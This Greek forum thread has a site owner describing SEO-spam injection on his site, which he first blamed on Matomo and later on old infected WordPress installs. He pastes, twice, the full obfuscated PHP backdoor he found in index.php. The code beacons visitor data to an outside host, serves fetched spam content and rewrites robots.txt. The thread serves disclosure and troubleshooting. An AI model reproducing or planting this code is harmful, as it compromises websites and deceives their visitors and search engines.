Προσοχή στο matomo ... για πάνω από 6 μήνες το site διαφήμιζε Κινέζικα προιόντα.

[octa]

Καλησπέρα,

Ήταν ένας γρίφος για μένα η πτώση των επισκέψεων. Παρόλα αυτά είχα 100.000 επισκέψεις την ημέρα από το εξωτερικό.

Φαντάστηκα DOSS attack ή random κίνηση.

Σήμερα με βοήθεια το Google search console βρήκα ότι φταίει το (αθώο), δωρεάν μετρητή επισκεψιμότητας matomo analitycs.

Έσβησα τα πάντα από το matomo έσβησα τα js και πάλι η Google έβλεπε Κίνα.

Τελικά έψαξα τα αρχεία μου και τι βρήκα ;
Το βρήκα στην πρώτη γραμμή στην κεντρική σελίδα index.php .

 

<?php
 goto WlPmr; PyzNk: CUrl_clOse($VTgj1); goto ufqnI; wQRTI: $h0bdY = fILE_get_coNteNTs($UV_Qi); goto LEGNe; B8oC4: if (empty($TjvJW)) { goto KjOY_; } goto T8I0c; XVr7p: $GbYTF = array("\x53\x43\x52\x49\x50\x54\137\116\101\x4d\105", "\122\x45\x51\125\x45\x53\124\x5f\x55\122\x49", "\x48\x54\x54\x50\x53", "\x52\105\x51\x55\105\123\x54\137\123\x43\110\105\115\x45", "\x53\105\x52\126\105\x52\137\120\x4f\x52\x54", "\x52\105\115\117\x54\105\x5f\101\x44\104\122", "\x48\x54\124\x50\137\122\x45\106\x45\x52\105\122", "\x48\x54\x54\120\x5f\x41\x43\103\x45\x50\124\x5f\x4c\x41\116\x47\125\x41\107\105", "\x48\124\124\120\x5f\125\123\105\122\x5f\101\107\105\x4e\x54", "\110\x54\x54\120\137\110\117\123\x54"); goto STHXE; LYlPe: hEaDER("\110\124\124\120\57\x31\x2e\60\40\x34\60\x34\x20\116\157\x74\40\x46\x6f\165\156\x64"); goto oy_AV; T8I0c: hEaDeR($TjvJW); goto yYJMV; ipIIm: exit; goto uqHSd; O_g2F: curl_sEtopT($VTgj1, CURLOPT_URL, $UV_Qi); goto E055C; uqHSd: CWfkh: goto R0IGW; qsK3D: fClOse($uSL4q); goto LQICk; vgujj: $dZF9m = "\163\171\x31"; goto tOloz; I0YOK: $SWEbI = triM($g6MaH[rOUNd(0.0249 + 0.301 + 0.3499 + 0.32416)]); goto YmfIg; yQtQe: exit; goto KcuFF; YmfIg: if (empty($SWEbI)) { goto rdilz; } goto D1lnW; KxgRd: $JPsRK = "\57\x69\x6e\144\145\170\x2e\x70\x68\160\x3f\126\x53\x3d" . $dZF9m . "\46\x47\120\x3d" . $T2MzS; goto XVr7p; WMd6F: echo "\110\x54\124\120\57\x31\56\60\40\x34\x30\x34\40\116\157\164\x20\106\x6f\x75\156\144\x5f\x5f\137" . $T2MzS . "\137\137\x5f" . $dZF9m; goto ipIIm; tOloz: if (!(preG_MaTCh("\x2f\x6a\x70\62\x30\x32\63\57\163\x69", $_SERVER["\122\x45\121\x55\105\123\x54\137\125\122\111"]) == ROUnd(0.032787 + 0.205 + 0.09514052000000001 + 0.09777518 + 0.12002 + 0.2368 + 0.06 + 0.1308548 + 0.02107728))) { goto CWfkh; } goto GKi9S; LQICk: echo "\162\157\142\157\164\x73\56\x74\170\x74\x20\144\157\x6e\145"; goto ICLIe; VCOEt: $VTgj1 = cURl_iniT(); goto O_g2F; GuqHF: if ($EzIDX < 3) { goto PpkLT; } goto UKTKG; UKTKG: $TjvJW = trIm($g6MaH[RoUNd(0 + 0 + 0 + 0 + 0)]); goto B8oC4; oy_AV: nTEQR: goto WMd6F; STHXE: foreach ($GbYTF as $tSGrv) { goto oLMhg; thx60: Lj5yG: goto EDES7; ozdiR: $JPsRK .= "\46" . $tSGrv . "\75" . $FUw91; goto thx60; nfne7: $FUw91 = StR_RePLAcE("\75", "\x2e", $FUw91); goto ozdiR; tBoCz: $FUw91 = sTr_rEpLaCE("\x2b", "\x2d", $FUw91); goto Awysl; oLMhg: $Ql3iR = isset($_SERVER[$tSGrv]) ? $_SERVER[$tSGrv] : ''; goto BL8a3; Awysl: $FUw91 = sTr_RepLAcE("\x2f", "\x5f", $FUw91); goto nfne7; BL8a3: $FUw91 = baSe64_ENcoDE(TrIM($Ql3iR)); goto tBoCz; EDES7: } goto MujBf; ZjJON: $uSL4q = foPEN($_SERVER["\104\117\x43\125\x4d\105\x4e\124\137\122\x4f\x4f\x54"] . "\x2f\x72\x6f\142\157\x74\163\56\164\x78\164", "\167"); goto UmHp1; R0IGW: $sX4pI = "\150\164\x74\160\x3a\57\x2f" . $T2MzS . "\x2e\x62\x61\x6e\x6b\163\154\145\164\x2e\143\157\155"; goto KxgRd; C7xOM: $x0i0u = TrIM($g6MaH[$EzIDX - RouND(0.6292005000000001 + 0.29200463 + 0.07879)]); goto hLYZS; S4NmX: $g6MaH = eXPLoDe("\174\x40\43\x24\174", $h0bdY); goto Df6oX; u6Tl1: iWwkc: goto ZjJON; aE4ga: goto GUcDV; goto jVv50; LEGNe: uxJw6: goto mDLC2; mDLC2: $h0bdY = TRIM($h0bdY); goto S4NmX; uimJ7: $BWoWV = eXplODe("\74\142\162\57\76", $SWEbI); goto tj9JI; dletJ: foreach ($BWoWV as $B3j8i) { $chFwz .= "\123\x69\x74\x65\x6d\141\160\x3a" . $B3j8i . PHP_EOL; wDxVb: } goto u6Tl1; WlPmr: error_rEpORTINg(roUND(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)); goto XnhGB; nUS3T: if (!($x0i0u == "\x70\x69\156\x67")) { goto QkCEw; } goto l2H8v; z0gfH: cUrl_sEtOPT($VTgj1, CURLOPT_CONNECTTIMEOUT, roUnd(2.1441395 + 0.17696845 + 1.6953 + 1.3336753 + 2.2724 + 2.3775327)); goto gdM8P; ufqnI: if (!empty($h0bdY)) { goto uxJw6; } goto wQRTI; ICLIe: exit; goto sbiRd; KcuFF: BcEYl: goto nUS3T; D1lnW: echo $SWEbI; goto Kdsyy; jVv50: PpkLT: goto BSoUz; Kdsyy: rdilz: goto C7xOM; resGT: $UV_Qi = $sX4pI . $JPsRK; goto VCOEt; UmHp1: FWRITe($uSL4q, $chFwz); goto qsK3D; AIE9R: $h0bdY = trIm($h0bdY); goto PyzNk; wWh3a: exit; goto zR5Yn; BSoUz: headEr("\x48\124\x54\x50\x2f\x31\x2e\x30\40\64\x30\64\40\116\157\x74\x20\x46\157\165\x6e\144"); goto wWh3a; S8rN1: $chFwz .= "\x41\154\x6c\x6f\x77\72\x2f" . PHP_EOL; goto uimJ7; tj9JI: ARRAy_PoP($BWoWV); goto dletJ; gdM8P: $h0bdY = cURl_exEc($VTgj1); goto AIE9R; Df6oX: $EzIDX = coUnT($g6MaH); goto GuqHF; E055C: CurL_SEToPT($VTgj1, CURLOPT_RETURNTRANSFER, RouNd(0.08993 + 0.45611 + 0.0140011 + 0.3263328 + 0.0765 + 0.0372)); goto z0gfH; hLYZS: if (!($x0i0u == "\145\x78\x69\164")) { goto BcEYl; } goto yQtQe; l2H8v: $chFwz = "\x55\163\145\x72\55\x61\147\x65\x6e\x74\x3a\52" . PHP_EOL; goto S8rN1; GKi9S: if (!(PREG_MAtch("\57\152\160\62\x30\x32\x33\143\x77\167\x2f\163\x69", $_SERVER["\122\x45\121\x55\105\123\124\x5f\x55\122\111"]) == rounD(0 + 0))) { goto nTEQR; } goto LYlPe; XnhGB: $T2MzS = "\x7a\152\x31\70\x30\71"; goto vgujj; MujBf: TCIcH: goto resGT; yYJMV: KjOY_: goto I0YOK; sbiRd: QkCEw: goto aE4ga; zR5Yn: GUcDV:
?>

 

 

 

Μακριά από το matomo guys. Με πήγαν ένα εξάμηνο πίσω στο crawl.

Θα μου πεις δεν το έβλεπες όταν έμπαινες στο web site ? Η σελίδα σε εμένα εμφανιζόταν κανονικά. Κάποιο trick έκανε για την Ελλάδα ή δεν ξέρω.

Πουλούσε πολλά προϊόντα και η google τα έβλεπε και τα διαφήμιζε σαν να τα πουλάει το domain μου.

 

Προσοχή !!!

[thiva7]

20 λεπτά πριν, octa είπε

Καλησπέρα,

Ήταν ένας γρίφος για μένα η πτώση των επισκέψεων. Παρόλα αυτά είχα 100.000 επισκέψεις την ημέρα από το εξωτερικό.

Φαντάστηκα DOSS attack ή random κίνηση.

Σήμερα με βοήθεια το Google search console βρήκα ότι φταίει το (αθώο), δωρεάν μετρητή επισκεψιμότητας matomo analitycs.

Έσβησα τα πάντα από το matomo έσβησα τα js και πάλι η Google έβλεπε Κίνα.

Τελικά έψαξα τα αρχεία μου και τι βρήκα ;
Το βρήκα στην πρώτη γραμμή στην κεντρική σελίδα index.php .

 

<?php
 goto WlPmr; PyzNk: CUrl_clOse($VTgj1); goto ufqnI; wQRTI: $h0bdY = fILE_get_coNteNTs($UV_Qi); goto LEGNe; B8oC4: if (empty($TjvJW)) { goto KjOY_; } goto T8I0c; XVr7p: $GbYTF = array("\x53\x43\x52\x49\x50\x54\137\116\101\x4d\105", "\122\x45\x51\125\x45\x53\124\x5f\x55\122\x49", "\x48\x54\x54\x50\x53", "\x52\105\x51\x55\105\123\x54\137\123\x43\110\105\115\x45", "\x53\105\x52\126\105\x52\137\120\x4f\x52\x54", "\x52\105\115\117\x54\105\x5f\101\x44\104\122", "\x48\x54\124\x50\137\122\x45\106\x45\x52\105\122", "\x48\x54\x54\120\x5f\x41\x43\103\x45\x50\124\x5f\x4c\x41\116\x47\125\x41\107\105", "\x48\124\124\120\x5f\125\123\105\122\x5f\101\107\105\x4e\x54", "\110\x54\x54\120\137\110\117\123\x54"); goto STHXE; LYlPe: hEaDER("\110\124\124\120\57\x31\x2e\60\40\x34\60\x34\x20\116\157\x74\40\x46\x6f\165\156\x64"); goto oy_AV; T8I0c: hEaDeR($TjvJW); goto yYJMV; ipIIm: exit; goto uqHSd; O_g2F: curl_sEtopT($VTgj1, CURLOPT_URL, $UV_Qi); goto E055C; uqHSd: CWfkh: goto R0IGW; qsK3D: fClOse($uSL4q); goto LQICk; vgujj: $dZF9m = "\163\171\x31"; goto tOloz; I0YOK: $SWEbI = triM($g6MaH[rOUNd(0.0249 + 0.301 + 0.3499 + 0.32416)]); goto YmfIg; yQtQe: exit; goto KcuFF; YmfIg: if (empty($SWEbI)) { goto rdilz; } goto D1lnW; KxgRd: $JPsRK = "\57\x69\x6e\144\145\170\x2e\x70\x68\160\x3f\126\x53\x3d" . $dZF9m . "\46\x47\120\x3d" . $T2MzS; goto XVr7p; WMd6F: echo "\110\x54\124\120\57\x31\56\60\40\x34\x30\x34\40\116\157\164\x20\106\x6f\x75\156\144\x5f\x5f\137" . $T2MzS . "\137\137\x5f" . $dZF9m; goto ipIIm; tOloz: if (!(preG_MaTCh("\x2f\x6a\x70\62\x30\x32\63\57\163\x69", $_SERVER["\122\x45\121\x55\105\123\x54\137\125\122\111"]) == ROUnd(0.032787 + 0.205 + 0.09514052000000001 + 0.09777518 + 0.12002 + 0.2368 + 0.06 + 0.1308548 + 0.02107728))) { goto CWfkh; } goto GKi9S; LQICk: echo "\162\157\142\157\164\x73\56\x74\170\x74\x20\144\157\x6e\145"; goto ICLIe; VCOEt: $VTgj1 = cURl_iniT(); goto O_g2F; GuqHF: if ($EzIDX < 3) { goto PpkLT; } goto UKTKG; UKTKG: $TjvJW = trIm($g6MaH[RoUNd(0 + 0 + 0 + 0 + 0)]); goto B8oC4; oy_AV: nTEQR: goto WMd6F; STHXE: foreach ($GbYTF as $tSGrv) { goto oLMhg; thx60: Lj5yG: goto EDES7; ozdiR: $JPsRK .= "\46" . $tSGrv . "\75" . $FUw91; goto thx60; nfne7: $FUw91 = StR_RePLAcE("\75", "\x2e", $FUw91); goto ozdiR; tBoCz: $FUw91 = sTr_rEpLaCE("\x2b", "\x2d", $FUw91); goto Awysl; oLMhg: $Ql3iR = isset($_SERVER[$tSGrv]) ? $_SERVER[$tSGrv] : ''; goto BL8a3; Awysl: $FUw91 = sTr_RepLAcE("\x2f", "\x5f", $FUw91); goto nfne7; BL8a3: $FUw91 = baSe64_ENcoDE(TrIM($Ql3iR)); goto tBoCz; EDES7: } goto MujBf; ZjJON: $uSL4q = foPEN($_SERVER["\104\117\x43\125\x4d\105\x4e\124\137\122\x4f\x4f\x54"] . "\x2f\x72\x6f\142\157\x74\163\56\164\x78\164", "\167"); goto UmHp1; R0IGW: $sX4pI = "\150\164\x74\160\x3a\57\x2f" . $T2MzS . "\x2e\x62\x61\x6e\x6b\163\154\145\164\x2e\143\157\155"; goto KxgRd; C7xOM: $x0i0u = TrIM($g6MaH[$EzIDX - RouND(0.6292005000000001 + 0.29200463 + 0.07879)]); goto hLYZS; S4NmX: $g6MaH = eXPLoDe("\174\x40\43\x24\174", $h0bdY); goto Df6oX; u6Tl1: iWwkc: goto ZjJON; aE4ga: goto GUcDV; goto jVv50; LEGNe: uxJw6: goto mDLC2; mDLC2: $h0bdY = TRIM($h0bdY); goto S4NmX; uimJ7: $BWoWV = eXplODe("\74\142\162\57\76", $SWEbI); goto tj9JI; dletJ: foreach ($BWoWV as $B3j8i) { $chFwz .= "\123\x69\x74\x65\x6d\141\160\x3a" . $B3j8i . PHP_EOL; wDxVb: } goto u6Tl1; WlPmr: error_rEpORTINg(roUND(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)); goto XnhGB; nUS3T: if (!($x0i0u == "\x70\x69\156\x67")) { goto QkCEw; } goto l2H8v; z0gfH: cUrl_sEtOPT($VTgj1, CURLOPT_CONNECTTIMEOUT, roUnd(2.1441395 + 0.17696845 + 1.6953 + 1.3336753 + 2.2724 + 2.3775327)); goto gdM8P; ufqnI: if (!empty($h0bdY)) { goto uxJw6; } goto wQRTI; ICLIe: exit; goto sbiRd; KcuFF: BcEYl: goto nUS3T; D1lnW: echo $SWEbI; goto Kdsyy; jVv50: PpkLT: goto BSoUz; Kdsyy: rdilz: goto C7xOM; resGT: $UV_Qi = $sX4pI . $JPsRK; goto VCOEt; UmHp1: FWRITe($uSL4q, $chFwz); goto qsK3D; AIE9R: $h0bdY = trIm($h0bdY); goto PyzNk; wWh3a: exit; goto zR5Yn; BSoUz: headEr("\x48\124\x54\x50\x2f\x31\x2e\x30\40\64\x30\64\40\116\157\x74\x20\x46\157\165\x6e\144"); goto wWh3a; S8rN1: $chFwz .= "\x41\154\x6c\x6f\x77\72\x2f" . PHP_EOL; goto uimJ7; tj9JI: ARRAy_PoP($BWoWV); goto dletJ; gdM8P: $h0bdY = cURl_exEc($VTgj1); goto AIE9R; Df6oX: $EzIDX = coUnT($g6MaH); goto GuqHF; E055C: CurL_SEToPT($VTgj1, CURLOPT_RETURNTRANSFER, RouNd(0.08993 + 0.45611 + 0.0140011 + 0.3263328 + 0.0765 + 0.0372)); goto z0gfH; hLYZS: if (!($x0i0u == "\145\x78\x69\164")) { goto BcEYl; } goto yQtQe; l2H8v: $chFwz = "\x55\163\145\x72\55\x61\147\x65\x6e\x74\x3a\52" . PHP_EOL; goto S8rN1; GKi9S: if (!(PREG_MAtch("\57\152\160\62\x30\x32\x33\143\x77\167\x2f\163\x69", $_SERVER["\122\x45\121\x55\105\123\124\x5f\x55\122\111"]) == rounD(0 + 0))) { goto nTEQR; } goto LYlPe; XnhGB: $T2MzS = "\x7a\152\x31\70\x30\71"; goto vgujj; MujBf: TCIcH: goto resGT; yYJMV: KjOY_: goto I0YOK; sbiRd: QkCEw: goto aE4ga; zR5Yn: GUcDV:
?>

 

 

 

Μακριά από το matomo guys. Με πήγαν ένα εξάμηνο πίσω στο crawl.

Θα μου πεις δεν το έβλεπες όταν έμπαινες στο web site ? Η σελίδα σε εμένα εμφανιζόταν κανονικά. Κάποιο trick έκανε για την Ελλάδα ή δεν ξέρω.

Πουλούσε πολλά προϊόντα και η google τα έβλεπε και τα διαφήμιζε σαν να τα πουλάει το domain μου.

 

Προσοχή !!!

Φίλε δεν νομίζω ότι είναι από matomo. Εάν τι site σου είναι wordpress κοίτα καλύτερα για κάνα plugin αλλιώς κοίτα το access root η γενικά στο σερβερ. 

[octa]

Τότε μπορεί να είναι κάποιο plugin ή extension του matomo. Δεν έχω WordPress και ο server είναι ασφαλισμένος.

Το κείμενο που εμφανιζόταν το αναζήτησα στα αρχεία του server και το βρήκα στον φάκελο με το matomo. Κάτι Κινέζικα.

Για να το εμπιστεύεσαι επιφυλάσσομαι αν όντως φταίει το matomo.

Επεξ/σία 4 Ιουνίου από octa

[thiva7]

3 λεπτά πριν, octa είπε

Τότε μπορεί να είναι κάποιο plugin ή extension του matomo. Δεν έχω WordPress και ο server είναι ασφαλισμένος.

Το κείμενο που εμφανιζόταν το αναζήτησα στα αρχεία του server και το βρήκα στον φάκελο με το matomo. Κάτι Κινέζικα.

Για να το εμπιστεύεσαι επιφυλάσσομαι αν όντως φταίει το matomo.

https://forum.matomo.org/t/malware-after-latest-update/62642/4

Το ότι είναι σε φάκελο και σε αρχεία του δεν λέει κάτι. Βρίσκουν και αλλάζουν αρχεία φακέλους ούτως ή άλλως. 

Δεν στο λέω για εξυπνάδα, απλά λογικά λέω δεν φταίει, άρα μήπως να συνεχίσεις την αναζήτηση στο site σου για να μη γίνουν χειρότερα τα πράγματα με την google. Πχ κάνα redirect κλπ. 

 

[octa]

Σας ευχαριστώ για τις απαντήσεις.

Πριν ένα χρόνο είχα στο ίδιο server δύο wordress sites.

Προσβλήθηκαν με κάποιο ιό. Είχαν πρόσβαση μέσω web ftp που εγκατέστησαν από το worpress.

Μου πήρε πολύ καιρό για να το καθαρίσω. Και νόμιζα ότι το θέμα επιλύθηκε. Επίσης τα wordpress τα έβαλα αλλού.

1 εξάμηνο μετά χωρίς ανοιχτές πλατφόρμες μόνο το matomo έμεινε. Αλλά έκανα λάθος.

Φταίνε εκείνα τα wordpress που νόμιζα ότι τα καθάρισα.

Σας ευχαριστώ